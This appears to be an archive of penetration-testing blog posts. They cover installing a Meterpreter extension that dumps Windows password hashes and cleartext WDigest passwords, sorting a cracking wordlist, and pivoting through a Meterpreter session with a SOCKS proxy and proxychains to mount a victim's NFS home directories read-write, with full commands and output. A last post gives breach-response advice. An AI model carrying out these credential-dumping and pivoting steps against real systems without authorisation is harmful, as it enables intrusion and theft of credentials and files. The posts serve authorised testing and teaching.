Room362.com

Mimikatz is awesome right, so is WCE. But both have one fatal flaw, even though you can execute them in memory {link} - you still have to have the binaries, remember the command to execute it in memory, and ultimately transfer the entire binary over so that metasploit can do its thing.

Then along came SessionDump. I only noticed this because someone was tweeting congratulations to someone on writing it:

No blog post or huge Vegas lights talk on it at DefCon or Blackhat. Just posted online in a corner of the Internet:

http://www.hsc.fr/ressources/outils/sessiondump/

Before we get started lets be clear about one thing. Sessiondump while awesome doesn't do everything that Mimikatz does. However, it does do the feature of mimikatz that I do use the most, the logged on user hash dumping as well as the wdigest clear text password dumping. It does this as a Meterpreter extension that operates using reflective DLL injection. Does that solve our minor issues we had with mimikatz, as of right now, only partially. This code was simply posted online, not in a pull request or submitted to Metasploit in any way. So you still have to have the binary + code. What about the remembering, surely it makes it so I can just tab complete my way to passwords right? Yup, it does, but until/if it is in the Metasploit trunk you will still have to remember how to get it installed (which we will go over in a bit). The final question is yes it does still transfer a complete DLL over to the host same as any of the other extensions (not to disk mind you, just memory),.

Without further ado lets go ahead and get the file and do a bunch of extracting. 

And finally placing everything in it's correct place, which was nice of the author to make easy by making the archive the same as the Metasploit directory structure:

Cool, everything should be good to go. Lets use this thing. I'm using psexec to get a shell but any way you get a windows native meterpreter fine, with one caveat, and its the same as with any of the other aforementioned tools. You need to be Admin (past UAC, w/ SeDebug privilege) or NT\AUTHORITY SYSTEM.  After that it's cake, load the extension:

Here is the available commands:

And run getHashes:

or getwDigestPasswords:

Thats is, you free passwords, YAY...

Possible issues you may run into:

1) If you are on a x64 box and meterpreter isn't running in a x64 process it will fail saying that it doesn't have the correct version offsets, here is how you can check:

x64 system and Meterpreter is x86/win32. Lets find a good process to migrate into and kick it from there. Winlogon isn't the greatest choices since if meterpreter decides to crash it during migration then the system will go down, whereas a service running as SYSTEM will probably just restart if something fails.

2) If by any chance you are running it against a system the author hasn't gotten the offsets for. I don't' have a screenshot for this one because he covers all the languages I have CMs for, but the author was awesome enough to include a few python scripts that can help you generate the correct offsets. I'll show you by running it on my lsass and widgets.dll files even though he already has this data included in the CSV file that comes with session dump.

Thats all for now folks, may the shells be with you.

Just a quick post to say that egypt and I will be giving Metasploit Mastery twice (2 x 2 day sessions) at BlackHat USA 2013. Come out and get your Metasploit on in Vegas w/ us

Linky: http://www.blackhat.com/us-13/training/metasploit-mastery.html

Current fill rate of July 27-28 session:

Current fill rate of July 29-30 session:

EOM

This is one of those stupid simple things that are easy to forget so I'm posting it here. Wordlists and dictionaries are awesome for cracking password hashes, and although, thanks to things like Mimikatz and WCE I don't have to, but there is times where it's important. 

Now, having John, Hashcat, or Cain go through a dictionary is a 1-for-1 hit, no time wasted no matter how it's sorted and usually is best to sort them by most common first so you get earlier hits. However, if you start throwing rules into the mix that equation changes. If you have "iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii" on the 3rd line of your dictionary, testing every possible permutation where you replace an 'i' with a 1 is going to take a very long time.

Both Hashcat and John deal with this by limiting the length where permutations occur. (HC/JTR peeps please correct me if I'm wrong). Cain on the other hand, will try every possibility and hang on the 3rd line for years (over exagerated). How do you solve that? Easy, remove any word over a certain length. While that does work, and very similar to what the HC/JTR do, I don't like loosing words from my dictionary, so I tend to sort them by length. That way, all the nasty ones are near the end and I can scale back the rules on them.

To do that is very simple:

awk '{print length, $0}' rockyou.txt | sort -n | cut -d " " -f2- > rockyou_ls.txt

Thats it. Basic, simple and stored here for reference.

You've found an NFS share on a pentest, it's sharing out your target's home directories (/home) and some SAN with all of the Windows AD users "home" directories under /volumes/users/. You only have a meterpreter session though... enough back story, problem is that Metasploit doesn't really have any auxiliary modules or otherwise to access the things on those shares. Please correct me if I'm wrong, but there also aren't any tools for talking to NFS shares over TCP only proxies.

Enter NfSpy: https://github.com/bonsaiviking/NfSpy

While it's original intent was aide in bypassing NFS security controls it has the right amount of options to make mounting NFS over Meterpreter possible.

First we setup up our route so that the aux module will go over the meterpreter session:

route add 192.168.1.0 255.255.255.0 1

The 1 on the end being the meterpreter session number it's going to be going through. Next up is to find out what exports are available:

msf > use auxiliary/scanner/nfs/nfsmount
msf auxiliary(nfsmount) > show options
Module options (auxiliary/scanner/nfs/nfsmount):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    111              yes       The target port
   THREADS  1                yes       The number of concurrent threads
msf auxiliary(nfsmount) > set RHOSTS 192.168.1.50
RHOSTS => 192.168.1.50
msf auxiliary(nfsmount) > run
[+] 192.168.1.50 NFS Export: /home [192.168.1.0/24]
[+] 192.168.1.50 NFS Export: /volume/users [192.168.1.0/24]

Looks like access is restricked by IP range, but luckily the victim is in said range. The final piece of information we need is the TCP port(s) that mountd is listening on. There is a metasploit module that can help use there too:

msf > use auxiliary/scanner/misc/sunrpc_portmapper
msf auxiliary(sunrpc_portmapper) > show options
Module options (auxiliary/scanner/misc/sunrpc_portmapper):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    111              yes       The target port
   THREADS  1                yes       The number of concurrent threads
msf auxiliary(sunrpc_portmapper) > set RHOSTS 192.168.1.50
RHOSTS => 192.168.1.50
msf auxiliary(sunrpc_portmapper) > run
[+] 192.168.1.50 - Programs available
        rpcbind - 111/tcp
        rpcbind - 111/udp
        status - 46797/udp
        status - 55731/tcp
        nfs - 2049/tcp
        nfs_acl - 2049/tcp
        nfs - 2049/udp
        nfs_acl - 2049/udp
        nlockmgr - 54167/udp
        nlockmgr - 38216/tcp
        mountd - 52569/udp
        mountd - 37719/tcp
        mountd - 39099/udp
        mountd - 55763/tcp
        mountd - 37808/udp
        mountd - 54457/tcp
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Cool, so lets target /home first with the mountd tcp port of 37719. Keeping our route where it is we set up Metasploit's socks proxy:

msf > use auxiliary/server/socks4a
msf auxiliary(socks4a) > show options
Module options (auxiliary/server/socks4a):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The address to listen on
   SRVPORT  1080             yes       The port to listen on.
msf auxiliary(socks4a) > set SRVPORT 9050
SRVPORT => 9050
msf auxiliary(socks4a) > set SRVHOST 127.0.0.1
SRVHOST => 127.0.0.1
msf auxiliary(socks4a) > run
[*] Auxiliary module execution completed
[*] Starting the socks4a proxy server

I chose 9050 as my SRVPORT since I have proxychains already set up for that port (ala tor) and I highly recommend setting the SRVHOST to 127.0.0.1, unless you either firewall that port off from the Internet or don't mind having the Anons of the world surf through your meterpreter session into your clients.

Next up it actually using nfspy (create or prep a directory so you can mount it first):

proxychains nfspy -d -o server=192.168.1.50:/home,nfsport=2049/tcp,mountport=37719/tcp,rw /root/nfspy/mount
ProxyChains-3.1 (http://proxychains.sf.net)
FUSE library version: 2.8.6
nullpath_ok: 0
unique: 1, opcode: INIT (26), nodeid: 0, insize: 56
INIT: 7.16
flags=0x0000007b
max_readahead=0x00020000
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.1.50:37719-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.1.50:2049-<><>-OK
   INIT: 7.12
   flags=0x00000011
   max_readahead=0x00020000
   max_write=0x00020000
   unique: 1, success, outsize: 40

proxychains nfspy -d -o server=192.168.1.50:/home,nfsport=2049/tcp,mountport=37719/tcp,rw /root/nfspy/mount

Lets break that command down. Proxychains will wrap nfspy so that it goes through our Metasploit Socks4a proxy. The -d tells NfSpy to stay in the foreground, and -o for options. Server is our target IP, only use a hostname if your attacker box can resolve it to the right IP. The export we found with the Metasploit module is up next, and the default NFS port of 2049. The mountport option is from the port mapper Metasploit module. Both of these port options be sure you specify the /tcp or you'll just be waiting as there isn't really a time out and Proxychains doesn't show UDP attempts. RW for read-write and finally the location to mount to.

If you see that second proxychains request for port 2049 it is usually a good indicator that it worked, if not you have probably run into anything from a permissions issue to a local mount problem. NfSpy uses fuse which can be really silent when problems arrise or give errors that tell you nothing meaningful. Thats why I'm using the -d option that keeps nfspy in the foreground, just so I can detect any issues. Lets see if that worked:

ls /root/nfspy/mount
user1
user2
user3
user4

Remember, big directories might take a while to navigate being tunneled like this. Here is the output from the ls on the nfspy side:

unique: 166, opcode: OPENDIR (27), nodeid: 34, insize: 48
   unique: 166, success, outsize: 32
unique: 167, opcode: READDIR (28), nodeid: 34, insize: 80
readdir[0] from 0
   unique: 167, success, outsize: 208
unique: 168, opcode: LOOKUP (1), nodeid: 34, insize: 46
LOOKUP /home/user3
getattr /home/user3
   NODEID: 40
   unique: 168, success, outsize: 144
unique: 169, opcode: LOOKUP (1), nodeid: 34, insize: 46
LOOKUP /home/user1
getattr /home/user1
   NODEID: 41
   unique: 169, success, outsize: 144
unique: 170, opcode: LOOKUP (1), nodeid: 34, insize: 46
LOOKUP /home/user4
getattr /home/user4
   NODEID: 42
   unique: 170, success, outsize: 144
unique: 171, opcode: LOOKUP (1), nodeid: 34, insize: 46
LOOKUP /home/user2
getattr /home/user2
   NODEID: 43
   unique: 171, success, outsize: 144

Thats it. You can mount read-write (rw) or read-only (ro) depending on what you want to do and how quiet you want to be.

Last note, you can't just CTRL-C an nfspy mount, you need to use `fusermount -u /root/nfspy/mount` to kill it. It's another fuse issue. If anyone has a better way to do this I'm all ears.

It seems like every week there is a new compromise of some service or another. But as a user what are you supposed to do with this knowledge? Here are some suggestions on things to do or think about when reacting:

Do you use the password you use there anywhere else?

• Think about starting to use a password manager like LastPass, 1Password, KeePass, or a product like Yubico. This way you can very easily use different passwords for different sites.
• Sit down and and start changing every where you use that password. Not just web sites, any machines (your work account) or applications are also possible targets. Start with the sites, machines, and applications that are most sensitive to you.
• It's ok to have a hand written list of passwords for sites. One of my favorite suggestions is to take your drivers license or business card and generate passwords by using every X character on the license and base the X number on the how many letters are in the website. So you use every 6th character for Google.
• It is NOT ok to store your passwords for anything in a Excel, Word or Text document. These are easy pickings for hackers and almost always targeted.
• Again, think about using a password manager

Do NOT change your password on the affected site or service immediately. You may never know the extent of the compromise but if the company says anything to the effect of "still under investigation" or "preliminary results", there is a chance that the attacker has also compromised the password reset mechanism so changing your password would just give the attacker the new one you have elected.

Do NOT stop using the service, if they have made it public that they were compromised, especially if they come out with the information first, the company is one of the few that take their dedication to their users seriously. If anything it's a positive (that they came out and said something, not that they were compromised). Very few companies are open about such things as it happens much more often than people want to admit to.

Got other suggestions for people on how to handle such news? Leave a comment and I'll include it in the main post with attribution.